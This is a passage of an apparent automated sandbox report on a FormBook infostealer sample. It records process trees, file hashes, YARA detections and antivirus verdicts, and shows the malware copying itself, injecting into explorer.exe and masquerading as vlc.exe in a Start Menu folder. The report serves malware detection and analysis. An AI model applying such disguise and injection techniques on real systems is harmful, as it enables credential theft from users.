                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low

                                              Analysis Process: oftmhayq.exe PID: 4000 Parent PID: 5184

                                              General

                                              Start time:11:38:11
                                              Start date:27/11/2020
                                              Path:C:\Users\Public\oftmhayq.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\Public\oftmhayq.exe'
                                              Imagebase:0xfa0000
                                              File size:552960 bytes
                                              MD5 hash:7E26E87AB642008D934824D509559859
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              Analysis Process: oftmhayq.exe PID: 3708 Parent PID: 4000

                                              General

                                              Start time:11:38:34
                                              Start date:27/11/2020
                                              Path:C:\Users\Public\oftmhayq.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\Public\oftmhayq.exe
                                              Imagebase:0x870000
                                              File size:552960 bytes
                                              MD5 hash:7E26E87AB642008D934824D509559859
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              Analysis Process: oftmhayq.exe PID: 2344 Parent PID: 5540

                                              General

                                              Start time:11:38:35
                                              Start date:27/11/2020
                                              Path:C:\Users\Public\oftmhayq.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\Public\oftmhayq.exe
                                              Imagebase:0x8a0000
                                              File size:552960 bytes
                                              MD5 hash:7E26E87AB642008D934824D509559859
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              Analysis Process: explorer.exe PID: 3388 Parent PID: 3708

                                              General

                                              Start time:11:38:37
                                              Start date:27/11/2020
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:
                                              Imagebase:0x7ff714890000
                                              File size:3933184 bytes
                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Analysis Process: vlc.exe PID: 3476 Parent PID: 3388

                                              General

                                              Start time:11:38:39
                                              Start date:27/11/2020
                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe'
                                              Imagebase:0x70000
                                              File size:552960 bytes
                                              MD5 hash:7E26E87AB642008D934824D509559859
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low

                                              Disassembly

                                              Code Analysis

                                              Reset < >